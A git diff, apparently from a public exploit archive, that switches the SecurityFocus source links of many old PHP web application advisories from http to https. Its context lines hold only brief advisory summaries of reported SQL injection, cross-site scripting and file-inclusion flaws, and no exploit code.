+source: https://www.securityfocus.com/bid/10153/info Reportedly phpBugTracker contains multiple input validation vulnerabilities; it is prone to multiple SQL injection, cross-site scripting and HTML injection issues. These issues are all due to a failure of the application to properly sanitize user supplied input. diff --git a/exploits/php/webapps/24007.txt b/exploits/php/webapps/24007.txt index 6a2f5d4e4..f6de2b8d1 100644 --- a/exploits/php/webapps/24007.txt +++ b/exploits/php/webapps/24007.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10153/info +source: https://www.securityfocus.com/bid/10153/info Reportedly phpBugTracker contains multiple input validation vulnerabilities; it is prone to multiple SQL injection, cross-site scripting and HTML injection issues. These issues are all due to a failure of the application to properly sanitize user supplied input. diff --git a/exploits/php/webapps/24008.html b/exploits/php/webapps/24008.html index bb51c7a44..048dc8b11 100644 --- a/exploits/php/webapps/24008.html +++ b/exploits/php/webapps/24008.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10154/info +source: https://www.securityfocus.com/bid/10154/info It has been reported that Campus Pipeline is prone to a remote email attachment script injection vulnerability. This issue is due to a failure of the application to properly sanitize user supplied HTML and script code contained in email documents. diff --git a/exploits/php/webapps/24009.txt b/exploits/php/webapps/24009.txt index 7dc9570aa..83a26eaab 100644 --- a/exploits/php/webapps/24009.txt +++ b/exploits/php/webapps/24009.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10156/info +source: https://www.securityfocus.com/bid/10156/info A vulnerability has been identified in the handling of input by Gemitel. Because of this, it may be possible for a remote user to gain unauthorized access to a system using the vulnerable software. diff --git a/exploits/php/webapps/24016.txt b/exploits/php/webapps/24016.txt index 46a7c8348..fc518b742 100644 --- a/exploits/php/webapps/24016.txt +++ b/exploits/php/webapps/24016.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10173/info +source: https://www.securityfocus.com/bid/10173/info Reportedly Phorum is affected by a remote SQL injection vulnerability. This issue is due to a failure of the application to properly sanitized user supplied URI input. diff --git a/exploits/php/webapps/24026.txt b/exploits/php/webapps/24026.txt index 18b7b0251..2c77fc1ad 100644 --- a/exploits/php/webapps/24026.txt +++ b/exploits/php/webapps/24026.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10177/info +source: https://www.securityfocus.com/bid/10177/info It has been reported that phpBB may be prone to a file include vulnerability that may allow remote attackers to include a remote malicious script to be executed on a vulnerable system. diff --git a/exploits/php/webapps/24034.txt b/exploits/php/webapps/24034.txt index 58b83fa02..eea97bb59 100644 --- a/exploits/php/webapps/24034.txt +++ b/exploits/php/webapps/24034.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10190/info +source: https://www.securityfocus.com/bid/10190/info Multiple vulnerabilities were reported to exist in phProfession, which is a third-party module for PostNuke. Path disclosure, cross-site scripting and SQL injection vulnerabilities were reported. diff --git a/exploits/php/webapps/24035.txt b/exploits/php/webapps/24035.txt index 93ed5ebfd..42eba40c5 100644 --- a/exploits/php/webapps/24035.txt +++ b/exploits/php/webapps/24035.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10190/info +source: https://www.securityfocus.com/bid/10190/info Multiple vulnerabilities were reported to exist in phProfession, which is a third-party module for PostNuke. Path disclosure, cross-site scripting and SQL injection vulnerabilities were reported. diff --git a/exploits/php/webapps/24036.txt b/exploits/php/webapps/24036.txt index c7151c756..aaf50030f 100644 --- a/exploits/php/webapps/24036.txt +++ b/exploits/php/webapps/24036.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10190/info +source: https://www.securityfocus.com/bid/10190/info Multiple vulnerabilities were reported to exist in phProfession, which is a third-party module for PostNuke. Path disclosure, cross-site scripting and SQL injection vulnerabilities were reported. diff --git a/exploits/php/webapps/24037.txt b/exploits/php/webapps/24037.txt index 1cfc69395..9e3eb144e 100644 --- a/exploits/php/webapps/24037.txt +++ b/exploits/php/webapps/24037.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10191/info +source: https://www.securityfocus.com/bid/10191/info Multiple vulnerabilities were reported to exist in PostNuke Phoenix. The following specific vulnerabilities were reported: diff --git a/exploits/php/webapps/24046.txt b/exploits/php/webapps/24046.txt index 27f6eca04..33f92704c 100644 --- a/exploits/php/webapps/24046.txt +++ b/exploits/php/webapps/24046.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10203/info +source: https://www.securityfocus.com/bid/10203/info An attacker may be capable of executing arbitrary script code in a browser of a target user and within the context of a visited web site. This may potentially lead to theft of cookie based authentication credentials, other attacks are also possible. diff --git a/exploits/php/webapps/24047.txt b/exploits/php/webapps/24047.txt index 39c7cce73..697ec5372 100644 --- a/exploits/php/webapps/24047.txt +++ b/exploits/php/webapps/24047.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10206/info +source: https://www.securityfocus.com/bid/10206/info Multiple vulnerabilities were reported to exist in Protector System, which is a third-party module for PHP-Nuke. Cross-site scripting and SQL injection vulnerabilities were reported. diff --git a/exploits/php/webapps/24048.txt b/exploits/php/webapps/24048.txt index 11c7902c2..6ea2e79b0 100644 --- a/exploits/php/webapps/24048.txt +++ b/exploits/php/webapps/24048.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10206/info +source: https://www.securityfocus.com/bid/10206/info Multiple vulnerabilities were reported to exist in Protector System, which is a third-party module for PHP-Nuke. Cross-site scripting and SQL injection vulnerabilities were reported. diff --git a/exploits/php/webapps/24050.txt b/exploits/php/webapps/24050.txt index b827242bb..17c11fa6e 100644 --- a/exploits/php/webapps/24050.txt +++ b/exploits/php/webapps/24050.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10209/info +source: https://www.securityfocus.com/bid/10209/info It has been reported that Advanced Guestbook is prone to a SQL injection vulnerability that could allow an attacker to gain administrative access to the application. diff --git a/exploits/php/webapps/24052.txt b/exploits/php/webapps/24052.txt index c0b2acd2a..9fdae8e74 100644 --- a/exploits/php/webapps/24052.txt +++ b/exploits/php/webapps/24052.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10214/info +source: https://www.securityfocus.com/bid/10214/info It has been reported that OpenBB is affected by multiple input validation vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied user input. diff --git a/exploits/php/webapps/24053.txt b/exploits/php/webapps/24053.txt index bdd6207dc..a397476d8 100644 --- a/exploits/php/webapps/24053.txt +++ b/exploits/php/webapps/24053.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10214/info +source: https://www.securityfocus.com/bid/10214/info It has been reported that OpenBB is affected by multiple input validation vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied user input. diff --git a/exploits/php/webapps/24054.txt b/exploits/php/webapps/24054.txt index 4fe3f3c70..20fffaae5 100644 --- a/exploits/php/webapps/24054.txt +++ b/exploits/php/webapps/24054.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10214/info +source: https://www.securityfocus.com/bid/10214/info It has been reported that OpenBB is affected by multiple input validation vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied user input. diff --git a/exploits/php/webapps/24055.txt b/exploits/php/webapps/24055.txt index 5a7a5325c..90fef55ea 100644 --- a/exploits/php/webapps/24055.txt +++ b/exploits/php/webapps/24055.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10214/info +source: https://www.securityfocus.com/bid/10214/info It has been reported that OpenBB is affected by multiple input validation vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied user input. diff --git a/exploits/php/webapps/24056.txt b/exploits/php/webapps/24056.txt index 131842343..b463d8890 100644 --- a/exploits/php/webapps/24056.txt +++ b/exploits/php/webapps/24056.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10214/info +source: https://www.securityfocus.com/bid/10214/info It has been reported that OpenBB is affected by multiple input validation vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied user input. diff --git a/exploits/php/webapps/24057.txt b/exploits/php/webapps/24057.txt index fda36f619..68e373b81 100644 --- a/exploits/php/webapps/24057.txt +++ b/exploits/php/webapps/24057.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10214/info +source: https://www.securityfocus.com/bid/10214/info It has been reported that OpenBB is affected by multiple input validation vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied user input. diff --git a/exploits/php/webapps/24058.txt b/exploits/php/webapps/24058.txt index 117742224..068361aab 100644 --- a/exploits/php/webapps/24058.txt +++ b/exploits/php/webapps/24058.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10214/info +source: https://www.securityfocus.com/bid/10214/info It has been reported that OpenBB is affected by multiple input validation vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied user input. diff --git a/exploits/php/webapps/24059.txt b/exploits/php/webapps/24059.txt index bc9fd8f42..fc33c7779 100644 --- a/exploits/php/webapps/24059.txt +++ b/exploits/php/webapps/24059.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10214/info +source: https://www.securityfocus.com/bid/10214/info It has been reported that OpenBB is affected by multiple input validation vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied user input. diff --git a/exploits/php/webapps/24060.txt b/exploits/php/webapps/24060.txt index 8a4ae131f..44a2704b6 100644 --- a/exploits/php/webapps/24060.txt +++ b/exploits/php/webapps/24060.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10215/info +source: https://www.securityfocus.com/bid/10215/info Reportedly the PHP-Nuke Video Gallery module is affected by multiple SQL injection vulnerabilities. This is due to a failure of the application to properly sanitize user-supplied input prior to using it in an SQL query. diff --git a/exploits/php/webapps/24061.txt b/exploits/php/webapps/24061.txt index aa5bf029d..35615e034 100644 --- a/exploits/php/webapps/24061.txt +++ b/exploits/php/webapps/24061.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10217/info +source: https://www.securityfocus.com/bid/10217/info It has been reported that OpenBB is affected by a private message disclosure vulnerability. This issue is due to a design error that fails to validate user credentials. diff --git a/exploits/php/webapps/24068.txt b/exploits/php/webapps/24068.txt index f8cba1dd5..fb94619fd 100644 --- a/exploits/php/webapps/24068.txt +++ b/exploits/php/webapps/24068.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10246/info +source: https://www.securityfocus.com/bid/10246/info It has been reported that SquirrelMail is affected by a cross-site scripting vulnerability in the handling of folder name displays. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamic web content. diff --git a/exploits/php/webapps/24071.txt b/exploits/php/webapps/24071.txt index 550b8d08c..d3d4640c1 100644 --- a/exploits/php/webapps/24071.txt +++ b/exploits/php/webapps/24071.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10251/info +source: https://www.securityfocus.com/bid/10251/info It has been reported that Moodle is susceptible to a cross-site scripting vulnerability in the 'help.php' script. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamic web content. diff --git a/exploits/php/webapps/24072.txt b/exploits/php/webapps/24072.txt index 23d057570..dfea9b837 100644 --- a/exploits/php/webapps/24072.txt +++ b/exploits/php/webapps/24072.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10253/info +source: https://www.securityfocus.com/bid/10253/info Coppermine Photo Gallery is reported prone to multiple input-validation vulnerabilities, some of which may lead to arbitrary command execution. These issues occur because the application fails to properly sanitize and validate user-supplied input before using it in dynamic content and in function calls that execute system commands. diff --git a/exploits/php/webapps/24073.txt b/exploits/php/webapps/24073.txt index 72e7fbc14..574122b9d 100644 --- a/exploits/php/webapps/24073.txt +++ b/exploits/php/webapps/24073.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10253/info +source: https://www.securityfocus.com/bid/10253/info Coppermine Photo Gallery is reported prone to multiple input-validation vulnerabilities, some of which may lead to arbitrary command execution. These issues occur because the application fails to properly sanitize and validate user-supplied input before using it in dynamic content and in function calls that execute system commands. diff --git a/exploits/php/webapps/24074.txt b/exploits/php/webapps/24074.txt index d011fa560..2a2649a3c 100644 --- a/exploits/php/webapps/24074.txt +++ b/exploits/php/webapps/24074.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10253/info +source: https://www.securityfocus.com/bid/10253/info Coppermine Photo Gallery is reported prone to multiple input-validation vulnerabilities, some of which may lead to arbitrary command execution. These issues occur because the application fails to properly sanitize and validate user-supplied input before using it in dynamic content and in function calls that execute system commands. diff --git a/exploits/php/webapps/24075.txt b/exploits/php/webapps/24075.txt index e2dfb03df..b868d6a3c 100644 --- a/exploits/php/webapps/24075.txt +++ b/exploits/php/webapps/24075.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10253/info +source: https://www.securityfocus.com/bid/10253/info Coppermine Photo Gallery is reported prone to multiple input-validation vulnerabilities, some of which may lead to arbitrary command execution. These issues occur because the application fails to properly sanitize and validate user-supplied input before using it in dynamic content and in function calls that execute system commands. diff --git a/exploits/php/webapps/24082.txt b/exploits/php/webapps/24082.txt index c56d5978c..4977f1d03 100644 --- a/exploits/php/webapps/24082.txt +++ b/exploits/php/webapps/24082.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10281/info +source: https://www.securityfocus.com/bid/10281/info It has been reported that Simple Machines Forum (SMF) may be prone to an HTML injection vulnerability that may allow an attacker to execute arbitrary HTML or script code in a user's browser. The issue exists due to insufficient sanitization of user-supplied input via the font size attribute. diff --git a/exploits/php/webapps/24083.txt b/exploits/php/webapps/24083.txt index 7fb8a9ac1..1aaa75b8e 100644 --- a/exploits/php/webapps/24083.txt +++ b/exploits/php/webapps/24083.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10283/info +source: https://www.securityfocus.com/bid/10283/info It has been reported that PHPX is affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24088.txt b/exploits/php/webapps/24088.txt index 2635fea8a..e4f760663 100644 --- a/exploits/php/webapps/24088.txt +++ b/exploits/php/webapps/24088.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10284/info +source: https://www.securityfocus.com/bid/10284/info It has been reported that PHPX is affected by multiple administrator command execution vulnerabilities. These issues are due to a failure of the application to properly validate access to administrative commands. diff --git a/exploits/php/webapps/24089.txt b/exploits/php/webapps/24089.txt index c778a2a8a..27e6abcd5 100644 --- a/exploits/php/webapps/24089.txt +++ b/exploits/php/webapps/24089.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10284/info +source: https://www.securityfocus.com/bid/10284/info It has been reported that PHPX is affected by multiple administrator command execution vulnerabilities. These issues are due to a failure of the application to properly validate access to administrative commands. diff --git a/exploits/php/webapps/24090.txt b/exploits/php/webapps/24090.txt index 424c765e7..dd7e9f454 100644 --- a/exploits/php/webapps/24090.txt +++ b/exploits/php/webapps/24090.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10284/info +source: https://www.securityfocus.com/bid/10284/info It has been reported that PHPX is affected by multiple administrator command execution vulnerabilities. These issues are due to a failure of the application to properly validate access to administrative commands. diff --git a/exploits/php/webapps/24091.txt b/exploits/php/webapps/24091.txt index 85419fe8c..cdeedc91a 100644 --- a/exploits/php/webapps/24091.txt +++ b/exploits/php/webapps/24091.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10284/info +source: https://www.securityfocus.com/bid/10284/info It has been reported that PHPX is affected by multiple administrator command execution vulnerabilities. These issues are due to a failure of the application to properly validate access to administrative commands. diff --git a/exploits/php/webapps/24092.txt b/exploits/php/webapps/24092.txt index 459c34c59..a342292b2 100644 --- a/exploits/php/webapps/24092.txt +++ b/exploits/php/webapps/24092.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10284/info +source: https://www.securityfocus.com/bid/10284/info It has been reported that PHPX is affected by multiple administrator command execution vulnerabilities. These issues are due to a failure of the application to properly validate access to administrative commands. diff --git a/exploits/php/webapps/24099.txt b/exploits/php/webapps/24099.txt index 11c70f672..5d418fdc7 100644 --- a/exploits/php/webapps/24099.txt +++ b/exploits/php/webapps/24099.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10306/info +source: https://www.securityfocus.com/bid/10306/info It has been reported that the NukeJokes module is affected by multiple input validation vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied user input. diff --git a/exploits/php/webapps/24100.txt b/exploits/php/webapps/24100.txt index 192eed776..a11faf0a0 100644 --- a/exploits/php/webapps/24100.txt +++ b/exploits/php/webapps/24100.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10306/info +source: https://www.securityfocus.com/bid/10306/info It has been reported that the NukeJokes module is affected by multiple input validation vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied user input. diff --git a/exploits/php/webapps/24104.txt b/exploits/php/webapps/24104.txt index 818a4ab30..018c3b524 100644 --- a/exploits/php/webapps/24104.txt +++ b/exploits/php/webapps/24104.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10314/info +source: https://www.securityfocus.com/bid/10314/info Reportedly Tutorials Manager is affected by multiple SQL injection vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/24124.txt b/exploits/php/webapps/24124.txt index e61fd812d..7ccb11dc9 100644 --- a/exploits/php/webapps/24124.txt +++ b/exploits/php/webapps/24124.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10362/info +source: https://www.securityfocus.com/bid/10362/info A weakness has been reported to exist in the VBulletin software that may allow an attacker to spoof parts of the VBulletin interface. The issue exists due to improper validation of user-supplied data. diff --git a/exploits/php/webapps/24126.txt b/exploits/php/webapps/24126.txt index 2d3f24de6..3ef56abc8 100644 --- a/exploits/php/webapps/24126.txt +++ b/exploits/php/webapps/24126.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10364/info +source: https://www.securityfocus.com/bid/10364/info osCommerce has a directory-traversal vulnerability that allows a remote attacker to possibly obtain sensitive information. The software improperly sanitizes user-supplied input and allows '../' directory-traversal character sequences when serving files. diff --git a/exploits/php/webapps/24127.txt b/exploits/php/webapps/24127.txt index aa8562714..5aab08b4c 100644 --- a/exploits/php/webapps/24127.txt +++ b/exploits/php/webapps/24127.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10365/info +source: https://www.securityfocus.com/bid/10365/info PHP-Nuke is prone to a potential file include vulnerability. This issue could allow a remote attacker to include malicious files containing aribtrary code to be executed on a vulnerable system. This issue can be exploited via the 'modpath' parameter. diff --git a/exploits/php/webapps/24131.txt b/exploits/php/webapps/24131.txt index 9a13fc54e..4d3479077 100644 --- a/exploits/php/webapps/24131.txt +++ b/exploits/php/webapps/24131.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10381/info +source: https://www.securityfocus.com/bid/10381/info DSM Light has been reported to be prone to a directory traversal vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24138.txt b/exploits/php/webapps/24138.txt index 0503ab79f..054ca20bf 100644 --- a/exploits/php/webapps/24138.txt +++ b/exploits/php/webapps/24138.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10395/info +source: https://www.securityfocus.com/bid/10395/info It is reported that e107 website system is prone to a remote HTML injection vulnerability. This issue is due to a failure by the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/24151.txt b/exploits/php/webapps/24151.txt index 01db9e601..338190ab4 100644 --- a/exploits/php/webapps/24151.txt +++ b/exploits/php/webapps/24151.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10430/info +source: https://www.securityfocus.com/bid/10430/info JPortal is reportedly affected by a remote SQL injection vulnerability in the print.inc.php script. This issue is due to a failure of the application to properly sanitize user-supplied URI input before using it in an SQL query. diff --git a/exploits/php/webapps/24152.txt b/exploits/php/webapps/24152.txt index 5e0c8c816..ab21412fe 100644 --- a/exploits/php/webapps/24152.txt +++ b/exploits/php/webapps/24152.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10435/info +source: https://www.securityfocus.com/bid/10435/info Land Down Under is prone to an HTML injection vulnerability. This issue is exposed through their BBCode implementation. Exploitation could permit theft of cookie credentials, manipulation of content, or other attacks. diff --git a/exploits/php/webapps/24153.txt b/exploits/php/webapps/24153.txt index 8808150eb..fb3fafaba 100644 --- a/exploits/php/webapps/24153.txt +++ b/exploits/php/webapps/24153.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10436/info +source: https://www.securityfocus.com/bid/10436/info e107 is prone to multiple cross-site scripting, HTML injection, file inclusion, and SQL injection vulnerabilities. This may compromise various security properties of a Web site running the software, including allowing remote attackers to execute malicious PHP code. diff --git a/exploits/php/webapps/24154.txt b/exploits/php/webapps/24154.txt index c2ad29742..0779500cd 100644 --- a/exploits/php/webapps/24154.txt +++ b/exploits/php/webapps/24154.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10436/info +source: https://www.securityfocus.com/bid/10436/info e107 is prone to multiple cross-site scripting, HTML injection, file inclusion, and SQL injection vulnerabilities. This may compromise various security properties of a Web site running the software, including allowing remote attackers to execute malicious PHP code. diff --git a/exploits/php/webapps/24166.txt b/exploits/php/webapps/24166.txt index ad9adf534..18007c6b3 100644 --- a/exploits/php/webapps/24166.txt +++ b/exploits/php/webapps/24166.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10447/info +source: https://www.securityfocus.com/bid/10447/info PHP-Nuke is affected by a direct script access security vulnerability. This issue is due to a failure to properly validate the location and name of the file being accessed. diff --git a/exploits/php/webapps/24167.txt b/exploits/php/webapps/24167.txt index 820b47e0f..8c3854003 100644 --- a/exploits/php/webapps/24167.txt +++ b/exploits/php/webapps/24167.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10450/info +source: https://www.securityfocus.com/bid/10450/info SquirrelMail is reported to be prone to a 'from' field email header HTML injection vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied email header strings. diff --git a/exploits/php/webapps/24168.txt b/exploits/php/webapps/24168.txt index 018f6ec5e..501c5d259 100644 --- a/exploits/php/webapps/24168.txt +++ b/exploits/php/webapps/24168.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10457/info +source: https://www.securityfocus.com/bid/10457/info Mail Manage EX is reportedly prone to a remote file include vulnerability. This vulnerability results from insufficient sanitization of user-supplied data and may allow remote attackers to include arbitrary PHP files located on remote servers. diff --git a/exploits/php/webapps/24169.txt b/exploits/php/webapps/24169.txt index d17b34e88..d885d607d 100644 --- a/exploits/php/webapps/24169.txt +++ b/exploits/php/webapps/24169.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10463/info +source: https://www.securityfocus.com/bid/10463/info CSLH is prone to multiple HTML injection vulnerabilities. These issues exist due to insufficient sanitization of user-supplied data. The problem presents itself in various modules of the application and can allow remote attackers to inject HTML code into the name field and in chat sessions for live help. diff --git a/exploits/php/webapps/24172.txt b/exploits/php/webapps/24172.txt index d54b12386..bdfbf0622 100644 --- a/exploits/php/webapps/24172.txt +++ b/exploits/php/webapps/24172.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10468/info +source: https://www.securityfocus.com/bid/10468/info cPanel is prone to a vulnerability that can allow a remote authenticated administrator to delete customer account DNS information for customers that are not administered by that administrator. This attack can allow an attacker to cause a denial of service condition against vulnerable Web sites. diff --git a/exploits/php/webapps/24176.txt b/exploits/php/webapps/24176.txt index 14058bb0d..7de5a8a33 100644 --- a/exploits/php/webapps/24176.txt +++ b/exploits/php/webapps/24176.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10483/info +source: https://www.securityfocus.com/bid/10483/info SurgeMail/WebMail is prone to multiple vulnerabilities. These issue result from insufficient sanitization of user-supplied data. The issues can allow an attacker to carry out path disclosure and cross-site scripting attacks. diff --git a/exploits/php/webapps/24177.txt b/exploits/php/webapps/24177.txt index f5ab2da46..9a970219b 100644 --- a/exploits/php/webapps/24177.txt +++ b/exploits/php/webapps/24177.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10483/info +source: https://www.securityfocus.com/bid/10483/info SurgeMail/WebMail is prone to multiple vulnerabilities. These issue result from insufficient sanitization of user-supplied data. The issues can allow an attacker to carry out path disclosure and cross-site scripting attacks. diff --git a/exploits/php/webapps/24183.txt b/exploits/php/webapps/24183.txt index 3070fc27b..f821ca53b 100644 --- a/exploits/php/webapps/24183.txt +++ b/exploits/php/webapps/24183.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10505/info +source: https://www.securityfocus.com/bid/10505/info cPanel is reportedly affected by a remote SQL injection vulnerability in the passwd script. This issue is due to a failure of the application to properly sanitize user-supplied URI parameter input before using it in an SQL query. diff --git a/exploits/php/webapps/24186.txt b/exploits/php/webapps/24186.txt index b507758ab..696976e8c 100644 --- a/exploits/php/webapps/24186.txt +++ b/exploits/php/webapps/24186.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10511/info +source: https://www.securityfocus.com/bid/10511/info Invision Power Board is reported prone to an SQL injection vulnerability in its 'ssi.php' script. diff --git a/exploits/php/webapps/24191.txt b/exploits/php/webapps/24191.txt index e89a7fce7..6d32a5f1e 100644 --- a/exploits/php/webapps/24191.txt +++ b/exploits/php/webapps/24191.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10524/info +source: https://www.securityfocus.com/bid/10524/info PHP-Nuke is prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data. The following specific issues can affect the application: diff --git a/exploits/php/webapps/24192.txt b/exploits/php/webapps/24192.txt index a9fe2dbd0..fa490f414 100644 --- a/exploits/php/webapps/24192.txt +++ b/exploits/php/webapps/24192.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10524/info +source: https://www.securityfocus.com/bid/10524/info PHP-Nuke is prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data. The following specific issues can affect the application: diff --git a/exploits/php/webapps/24193.txt b/exploits/php/webapps/24193.txt index aabd21b55..24575924b 100644 --- a/exploits/php/webapps/24193.txt +++ b/exploits/php/webapps/24193.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10524/info +source: https://www.securityfocus.com/bid/10524/info PHP-Nuke is prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data. The following specific issues can affect the application: diff --git a/exploits/php/webapps/24194.txt b/exploits/php/webapps/24194.txt index 8083fc93f..ce59b38d5 100644 --- a/exploits/php/webapps/24194.txt +++ b/exploits/php/webapps/24194.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10524/info +source: https://www.securityfocus.com/bid/10524/info PHP-Nuke is prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data. The following specific issues can affect the application: diff --git a/exploits/php/webapps/24199.txt b/exploits/php/webapps/24199.txt index 1416cd1f4..ade115b76 100644 --- a/exploits/php/webapps/24199.txt +++ b/exploits/php/webapps/24199.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10539/info +source: https://www.securityfocus.com/bid/10539/info Invision Power Board 'ssi.php' script reported prone to a cross-site scripting vulnerability. The issue presents itself due to a lack of sufficient sanitization performed by functions in the 'ssi.php' script on user-influenced 'f' parameter. This can permit the theft of cookie-based authentication credentials; other attacks may also be possible. diff --git a/exploits/php/webapps/24212.txt b/exploits/php/webapps/24212.txt index 2ffa91b1e..6e62cd200 100644 --- a/exploits/php/webapps/24212.txt +++ b/exploits/php/webapps/24212.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10553/info +source: https://www.securityfocus.com/bid/10553/info It has been reported that Pivot is affected by a remote file include vulnerability contained within the module_db.php script. This issue is due to a failure of the application to properly sanitize user-supplied input before including it as a parameter to a file include function call. diff --git a/exploits/php/webapps/24215.txt b/exploits/php/webapps/24215.txt index f5808391e..742012dfc 100644 --- a/exploits/php/webapps/24215.txt +++ b/exploits/php/webapps/24215.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10556/info +source: https://www.securityfocus.com/bid/10556/info phpHeaven phpMyChat is reported prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data and design flaws. The following specific issues can affect the application: diff --git a/exploits/php/webapps/24216.html b/exploits/php/webapps/24216.html index ba700498e..8a0bce510 100644 --- a/exploits/php/webapps/24216.html +++ b/exploits/php/webapps/24216.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10556/info +source: https://www.securityfocus.com/bid/10556/info phpHeaven phpMyChat is reported prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data and design flaws. The following specific issues can affect the application: diff --git a/exploits/php/webapps/24217.txt b/exploits/php/webapps/24217.txt index d47ee75df..fe274a1b8 100644 --- a/exploits/php/webapps/24217.txt +++ b/exploits/php/webapps/24217.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10556/info +source: https://www.securityfocus.com/bid/10556/info phpHeaven phpMyChat is reported prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data and design flaws. The following specific issues can affect the application: diff --git a/exploits/php/webapps/24225.php b/exploits/php/webapps/24225.php index 8af07ffd0..4e7ada9c0 100644 --- a/exploits/php/webapps/24225.php +++ b/exploits/php/webapps/24225.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10586/info +source: https://www.securityfocus.com/bid/10586/info osTicket is reported prone to a remote command execution vulnerability. The issue is reported to present itself because attachments submitted as a part of a support ticket request are 